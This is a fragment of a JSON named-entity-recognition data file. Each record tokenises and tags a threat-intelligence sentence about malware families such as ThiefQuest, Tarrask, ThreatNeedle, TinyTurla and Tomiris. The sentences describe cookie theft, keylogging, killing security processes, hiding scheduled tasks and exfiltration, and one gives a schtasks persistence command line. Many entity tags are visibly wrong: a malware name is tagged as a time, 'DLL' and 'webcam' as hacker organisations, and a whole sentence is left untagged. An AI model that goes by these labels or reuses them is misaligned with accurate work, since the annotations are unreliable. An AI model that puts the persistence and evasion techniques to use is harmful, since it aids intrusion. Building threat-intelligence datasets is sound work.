- "identify", - "which", - "anti-virus", - "products,", - "firewalls,", - "and", - "anti-spyware", - "products", - "are", - "in", - "use." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "TajMahal", - "has", - "the", - "ability", - "to", - "inject", - "the", - "<code>LoadLibrary</code>", - "call", - "template", - "DLL", - "into", - "running", - "processes." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "B-Features", - "O", - "O", - "I-Features", - "I-Features", - "B-HackOrg", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "TajMahal", - "has", - "the", - "ability", - "to", - "identify", - "the", - "Internet", - "Explorer", - "(IE)", - "version", - "on", - "an", - "infected", - "host." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "TajMahal", - "has", - "the", - "ability", - "to", - "steal", - "web", - "session", - "cookies", - "from", - "Internet", - "Explorer,", - "Netscape", - "Navigator,", - "FireFox", - "and", - "RealNetworks", - "applications." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "I-Features", - "I-Features", - "I-Features", - "I-Features", - "O", - "O", - "O", - "B-Way", - "B-Tool", - "B-Way", - "O", - "B-Way", - "B-Tool" - ] - }, - { - "tokens": [ - "TajMahal", - "has", - "the", - "ability", - "to", - "identify", - "hardware", - "information,", - "the", - "computer", - "name,", - "and", - "OS", - "information", - "on", - "an", - "infected", - "host." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "TajMahal", - "has", - "the", - "ability", - "to", - "identify", - "the", - "MAC", - "address", - "on", - "an", - "infected", - "host." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "TajMahal", - "has", - "the", - "ability", - "to", - "determine", - "local", - "time", - "on", - "a", - "compromised", - "host." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "TajMahal", - "has", - "the", - "ability", - "to", - "capture", - "webcam", - "video." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "I-Features", - "B-HackOrg", - "B-Features" - ] - }, - { - "tokens": [ - "Tarrask", - "is", - "able", - "to", - "create", - "“hidden”", - "scheduled", - "tasks", - "by", - "deleting", - "the", - "Security", - "Descriptor", - "(`SD`)", - "registry", - "value." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Tarrask", - "creates", - "a", - "scheduled", - "task", - "called", - "“WinUpdate”", - "to", - "re-establish", - "any", - "dropped", - "C2", - "connections." - ], - "ner_tags": [ - "B-Time", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Tarrask", - "has", - "masqueraded", - "as", - "executable", - "files", - "such", - "as", - "`winupdate.exe`,", - "`date.exe`,", - "or", - "`win.exe`." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "B-SamFile", - "O", - "B-SamFile" - ] - }, - { - "tokens": [ - "Tarrask", - "is", - "able", - "to", - "delete", - "the", - "Security", - "Descriptor", - "(`SD`)", - "registry", - "subkey", - "in", - "order", - "to", - "“hide”", - "scheduled", - "tasks." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Tarrask", - "is", - "able", - "to", - "create", - "“hidden”", - "scheduled", - "tasks", - "for", - "persistence." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Tarrask", - "leverages", - "token", - "theft", - "to", - "obtain", - "`lsass.exe`", - "security", - "permissions." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Tarrask", - "may", - "abuse", - "the", - "Windows", - "schtasks", - "command-line", - "tool", - "to", - "create", - "\"hidden\"", - "scheduled", - "tasks." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Tasklist", - "can", - "be", - "used", - "to", - "discover", - "processes", - "running", - "on", - "a", - "system." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Tasklist", - "can", - "be", - "used", - "to", - "enumerate", - "security", - "software", - "currently", - "running", - "on", - "a", - "system", - "by", - "process", - "name", - "of", - "known", - "products." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "B-Features", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Tasklist", - "can", - "be", - "used", - "to", - "discover", - "services", - "running", - "on", - "a", - "system." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "I-Features", - "I-Features", - "I-Features", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "ThiefQuest", - "uses", - "AppleScript's", - "<code>osascript", - "-e</code>", - "command", - "to", - "launch", - "ThiefQuest's", - "persistence", - "via", - "Launch", - "Agent", - "and", - "Launch", - "Daemon." - ], - "ner_tags": [ - "B-Idus", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Tool", - "O", - "O", - "I-Tool", - "O" - ] - }, - { - "tokens": [ - "ThiefQuest", - "searches", - "through", - "the", - "<code>/Users/</code>", - "folder", - "looking", - "for", - "executable", - "files.", - "For", - "each", - "executable,", - "ThiefQuest", - "prepends", - "a", - "copy", - "of", - "itself", - "to", - "the", - "beginning", - "of", - "the", - "file.", - "When", - "the", - "file", - "is", - "executed,", - "the", - "ThiefQuest", - "code", - "is", - "executed", - "first.", - "ThiefQuest", - "creates", - "a", - "hidden", - "file,", - "copies", - "the", - "original", - "target", - "executable", - "to", - "the", - "file,", - "then", - "executes", - "the", - "new", - "hidden", - "file", - "to", - "maintain", - "the", - "appearance", - "of", - "normal", - "behavior." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "ThiefQuest", - "encrypts", - "a", - "set", - "of", - "file", - "extensions", - "on", - "a", - "host,", - "deletes", - "the", - "original", - "files,", - "and", - "provides", - "a", - "ransom", - "note", - "with", - "no", - "contact", - "information." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "ThiefQuest", - "uses", - "a", - "function", - "named", - "<code>is_debugging</code>", - "to", - "perform", - "anti-debugging", - "logic.", - "The", - "function", - "invokes", - "<code>sysctl</code>", - "checking", - "the", - "returned", - "value", - "of", - "<code>P_TRACED</code>.", - "ThiefQuest", - "also", - "calls", - "<code>ptrace</code>", - "with", - "the", - "<code>PTRACE_DENY_ATTACH</code>", - "flag", - "to", - "prevent", - "debugging." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "ThiefQuest", - "uses", - "the", - "function", - "<code>kill_unwanted</code>", - "to", - "obtain", - "a", - "list", - "of", - "running", - "processes", - "and", - "kills", - "each", - "process", - "matching", - "a", - "list", - "of", - "security", - "related", - "processes." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "ThiefQuest", - "exfiltrates", - "targeted", - "file", - "extensions", - "in", - "the", - "<code>/Users/</code>", - "folder", - "to", - "the", - "command", - "and", - "control", - "server", - "via", - "unencrypted", - "HTTP.", - "Network", - "packets", - "contain", - "a", - "string", - "with", - "two", - "pieces", - "of", - "information:", - "a", - "file", - "path", - "and", - "the", - "contents", - "of", - "the", - "file", - "in", - "a", - "base64", - "encoded", - "string." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "ThiefQuest", - "hides", - "a", - "copy", - "of", - "itself", - "in", - "the", - "user's", - "<code>~/Library</code>", - "directory", - "by", - "using", - "a", - "<code>.</code>", - "at", - "the", - "beginning", - "of", - "the", - "file", - "name", - "followed", - "by", - "9", - "random", - "characters." - ], - "ner_tags": [ - "O", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "ThiefQuest", - "can", - "download", - "and", - "execute", - "payloads", - "in-memory", - "or", - "from", - "disk." - ], - "ner_tags": [ - "B-SamFile", - "O", - "B-Features", - "O", - "I-Features", - "B-HackOrg", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "ThiefQuest", - "uses", - "the", - "<code>CGEventTap</code>", - "functions", - "to", - "perform", - "keylogging." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "B-SamFile", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "ThiefQuest", - "installs", - "a", - "launch", - "item", - "using", - "an", - "embedded", - "encrypted", - "launch", - "agent", - "property", - "list", - "template.", - "The", - "plist", - "file", - "is", - "installed", - "in", - "the", - "<code>~/Library/LaunchAgents/</code>", - "folder", - "and", - "configured", - "with", - "the", - "path", - "to", - "the", - "persistent", - "binary", - "located", - "in", - "the", - "<code>~/Library/</code>", - "folder." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "I-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "When", - "running", - "with", - "root", - "privileges", - "after", - "a", - "Launch", - "Agent", - "is", - "installed,", - "ThiefQuest", - "installs", - "a", - "plist", - "file", - "to", - "the", - "<code>/Library/LaunchDaemons/</code>", - "folder", - "with", - "the", - "<code>RunAtLoad</code>", - "key", - "set", - "to", - "<code>true</code>", - "establishing", - "persistence", - "as", - "a", - "Launch", - "Daemon." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "I-Tool", - "I-Tool", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "I-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "I-Tool", - "O" - ] - }, - { - "tokens": [ - "ThiefQuest", - "prepends", - "a", - "copy", - "of", - "itself", - "to", - "the", - "beginning", - "of", - "an", - "executable", - "file", - "while", - "maintaining", - "the", - "name", - "of", - "the", - "executable." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "ThiefQuest", - "uses", - "various", - "API", - "to", - "perform", - "behaviors", - "such", - "as", - "executing", - "payloads", - "and", - "performing", - "local", - "enumeration." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Features", - "B-Way", - "O", - "O", - "I-Features", - "B-HackOrg" - ] - }, - { - "tokens": [ - "ThiefQuest", - "obtains", - "a", - "list", - "of", - "running", - "processes", - "using", - "the", - "function", - "<code>kill_unwanted</code>." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile" - ] - }, - { - "tokens": [ - "ThiefQuest", - "uses", - "various", - "API", - "functions", - "such", - "as", - "<code>NSCreateObjectFileImageFromMemory</code>", - "to", - "load", - "and", - "link", - "in-memory", - "payloads." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "ThiefQuest", - "uses", - "the", - "<code>kill_unwanted</code>", - "function", - "to", - "get", - "a", - "list", - "of", - "running", - "processes,", - "compares", - "each", - "process", - "with", - "an", - "encrypted", - "list", - "of", - "“unwanted”", - "security", - "related", - "programs,", - "and", - "kills", - "the", - "processes", - "for", - "security", - "related", - "programs." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "B-Way", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "ThiefQuest", - "invokes", - "<code>time</code>", - "call", - "to", - "check", - "the", - "system's", - "time,", - "executes", - "a", - "<code>sleep</code>", - "command,", - "invokes", - "a", - "second", - "<code>time</code>", - "call,", - "and", - "then", - "compares", - "the", - "time", - "difference", - "between", - "the", - "two", - "<code>time</code>", - "calls", - "and", - "the", - "amount", - "of", - "time", - "the", - "system", - "slept", - "to", - "identify", - "the", - "sandbox." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "ThiefQuest", - "uploads", - "files", - "via", - "unencrypted", - "HTTP." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "ThreatNeedle", - "can", - "collect", - "data", - "and", - "files", - "from", - "a", - "compromised", - "host." - ], - "ner_tags": [ - "B-SamFile", - "O", - "I-Features", - "I-Features", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "ThreatNeedle", - "can", - "decrypt", - "its", - "payload", - "using", - "RC4,", - "AES,", - "or", - "one-byte", - "XORing." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "B-Way", - "O", - "B-Way", - "B-Tool" - ] - }, - { - "tokens": [ - "ThreatNeedle", - "has", - "been", - "compressed", - "and", - "obfuscated", - "using", - "RC4,", - "AES,", - "or", - "XOR." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "B-Way", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "ThreatNeedle", - "can", - "obtain", - "file", - "and", - "directory", - "information." - ], - "ner_tags": [ - "B-SamFile", - "O", - "I-Features", - "I-Features", - "I-Features", - "I-Features", - "O" - ] - }, - { - "tokens": [ - "ThreatNeedle", - "can", - "save", - "its", - "configuration", - "data", - "as", - "a", - "RC4-encrypted", - "Registry", - "key", - "under", - "`HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\GameCon`." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "ThreatNeedle", - "can", - "download", - "additional", - "tools", - "to", - "enable", - "lateral", - "movement." - ], - "ner_tags": [ - "B-SamFile", - "O", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "ThreatNeedle", - "relies", - "on", - "a", - "victim", - "to", - "click", - "on", - "a", - "malicious", - "document", - "for", - "initial", - "execution." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "ThreatNeedle", - "chooses", - "its", - "payload", - "creation", - "path", - "from", - "a", - "randomly", - "selected", - "service", - "name", - "from", - "netsvc." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "ThreatNeedle", - "can", - "modify", - "the", - "Registry", - "to", - "save", - "its", - "configuration", - "data", - "as", - "the", - "following", - "RC4-encrypted", - "Registry", - "key:", - "`HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\GameCon`." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile" - ] - }, - { - "tokens": [ - "ThreatNeedle", - "can", - "be", - "loaded", - "into", - "the", - "Startup", - "folder", - "(`%APPDATA%\\Microsoft\\Windows\\Start", - "Menu\\Programs\\Startup\\OneDrives.lnk`)", - "as", - "a", - "Shortcut", - "file", - "for", - "persistence." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "I-SamFile", - "O", - "O" - ] - }, - { - "tokens": [ - "ThreatNeedle", - "has", - "been", - "distributed", - "via", - "a", - "malicious", - "Word", - "document", - "within", - "a", - "spearphishing", - "email." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "I-SamFile", - "I-SamFile", - "O", - "O", - "B-Way", - "O" - ] - }, - { - "tokens": [ - "ThreatNeedle", - "can", - "collect", - "system", - "profile", - "information", - "from", - "a", - "compromised", - "host." - ], - "ner_tags": [ - "B-SamFile", - "O", - "I-Features", - "I-Features", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "ThreatNeedle", - "can", - "run", - "in", - "memory", - "and", - "register", - "its", - "payload", - "as", - "a", - "Windows", - "service." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "TinyTurla", - "has", - "the", - "ability", - "to", - "encrypt", - "C2", - "traffic", - "with", - "SSL/TLS." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "B-Features", - "B-HackOrg", - "B-Features", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "TinyTurla", - "can", - "upload", - "files", - "from", - "a", - "compromised", - "host." - ], - "ner_tags": [ - "B-SamFile", - "O", - "B-Features", - "I-Features", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "TinyTurla", - "can", - "go", - "through", - "a", - "list", - "of", - "C2", - "server", - "IPs", - "and", - "will", - "try", - "to", - "register", - "with", - "each", - "until", - "one", - "responds." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "TinyTurla", - "can", - "save", - "its", - "configuration", - "parameters", - "in", - "the", - "Registry." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "TinyTurla", - "has", - "the", - "ability", - "to", - "act", - "as", - "a", - "second-stage", - "dropper", - "used", - "to", - "infect", - "the", - "system", - "with", - "additional", - "malware." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Features", - "I-Features", - "I-Features", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "TinyTurla", - "has", - "mimicked", - "an", - "existing", - "Windows", - "service", - "by", - "being", - "installed", - "as", - "<code>Windows", - "Time", - "Service</code>." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "TinyTurla", - "has", - "been", - "deployed", - "as", - "`w64time.dll`", - "to", - "appear", - "legitimate." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "B-SamFile", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "TinyTurla", - "can", - "set", - "its", - "configuration", - "parameters", - "in", - "the", - "Registry." - ], - "ner_tags": [ - "B-Way", - "O", - "I-Features", - "I-Features", - "I-Features", - "I-Features", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "TinyTurla", - "has", - "used", - "`WinHTTP`,", - "`CreateProcess`,", - "and", - "other", - "APIs", - "for", - "C2", - "communications", - "and", - "other", - "functions." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "TinyTurla", - "can", - "query", - "the", - "Registry", - "for", - "its", - "configuration", - "information." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "TinyTurla", - "contacts", - "its", - "C2", - "based", - "on", - "a", - "scheduled", - "timing", - "set", - "in", - "its", - "configuration." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "TinyTurla", - "can", - "install", - "itself", - "as", - "a", - "service", - "on", - "compromised", - "machines." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "TinyTurla", - "can", - "use", - "HTTPS", - "in", - "C2", - "communications." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "B-Way", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "TinyTurla", - "has", - "been", - "installed", - "using", - "a", - ".bat", - "file." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "B-Tool" - ] - }, - { - "tokens": [ - "TinyZBot", - "contains", - "functionality", - "to", - "collect", - "information", - "from", - "the", - "clipboard." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "I-Features", - "I-Features", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "TinyZBot", - "can", - "disable", - "Avira", - "anti-virus." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "TinyZBot", - "contains", - "keylogger", - "functionality." - ], - "ner_tags": [ - "B-Way", - "O", - "B-Way", - "O" - ] - }, - { - "tokens": [ - "TinyZBot", - "can", - "create", - "a", - "shortcut", - "in", - "the", - "Windows", - "startup", - "folder", - "for", - "persistence." - ], - "ner_tags": [ - "B-Way", - "O", - "I-Features", - "I-Features", - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "TinyZBot", - "contains", - "screen", - "capture", - "functionality." - ], - "ner_tags": [ - "B-Way", - "O", - "I-Features", - "I-Features", - "O" - ] - }, - { - "tokens": [ - "TinyZBot", - "can", - "create", - "a", - "shortcut", - "in", - "the", - "Windows", - "startup", - "folder", - "for", - "persistence." - ], - "ner_tags": [ - "B-Way", - "O", - "I-Features", - "I-Features", - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "TinyZBot", - "supports", - "execution", - "from", - "the", - "command-line." - ], - "ner_tags": [ - "B-Way", - "O", - "B-Features", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "TinyZBot", - "can", - "install", - "as", - "a", - "Windows", - "service", - "for", - "persistence." - ], - "ner_tags": [ - "B-Way", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Tomiris", - "has", - "the", - "ability", - "to", - "collect", - "recent", - "files", - "matching", - "a", - "hardcoded", - "list", - "of", - "extensions", - "prior", - "to", - "exfiltration." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "B-Features", - "O", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Tomiris", - "has", - "connected", - "to", - "a", - "signalization", - "server", - "that", - "provides", - "a", - "URL", - "and", - "port,", - "and", - "then", - "Tomiris", - "sends", - "a", - "GET", - "request", - "to", - "that", - "URL", - "to", - "establish", - "C2." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Tomiris", - "can", - "upload", - "files", - "matching", - "a", - "hardcoded", - "set", - "of", - "extensions,", - "such", - "as", - ".doc,", - ".docx,", - ".pdf,", - "and", - ".rar,", - "to", - "its", - "C2", - "server." - ], - "ner_tags": [ - "B-SamFile", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "B-SamFile", - "B-SamFile", - "O", - "B-SamFile", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Tomiris", - "can", - "download", - "files", - "and", - "execute", - "them", - "on", - "a", - "victim's", - "system." - ], - "ner_tags": [ - "B-SamFile", - "O", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Tomiris", - "has", - "used", - "`SCHTASKS", - "/CREATE", - "/SC", - "DAILY", - "/TN", - "StartDVL", - "/TR", - "\"[path", - "to", - "self]\"", - "/ST", - "10:00`", - "to", - "establish", - "persistence." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "B-Way", - "B-Way", - "B-Way", - "B-Tool", - "B-Way", - "B-Way", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Tomiris", - "has", - "been", - "packed", - "with", - "UPX." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "Tomiris", - "has", - "the", - "ability", - "to", - "sleep", - "for", - "at", - "least", - "nine", - "minutes", - "to", - "evade", - "sandbox-based", - "analysis", - "systems." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Tomiris", - "can", - "use", - "HTTP", - "to", - "establish", - "C2", - "communications." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Tor", - "encapsulates", - "traffic", - "in", - "multiple", - "layers", - "of", - "encryption,", - "using", - "TLS", - "by", - "default." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O" - ] - }, - { - "tokens": [ - "Traffic", - "traversing", - "the", - "Tor", - "network", - "will", - "be", - "forwarded", - "to", - "multiple", - "nodes", - "before", - "exiting", - "the", - "Tor", - "network", - "and", - "continuing", - "on", - "to", - "its", - "intended", - "destination." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Torisma", - "has", - "used", - "XOR", - "and", - "Base64", - "to", - "decode", - "C2", - "data." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "B-Way", - "O", - "B-Way", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Torisma", - "has", - "been", - "Base64", - "encoded", - "and", - "AES", - "encrypted." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": 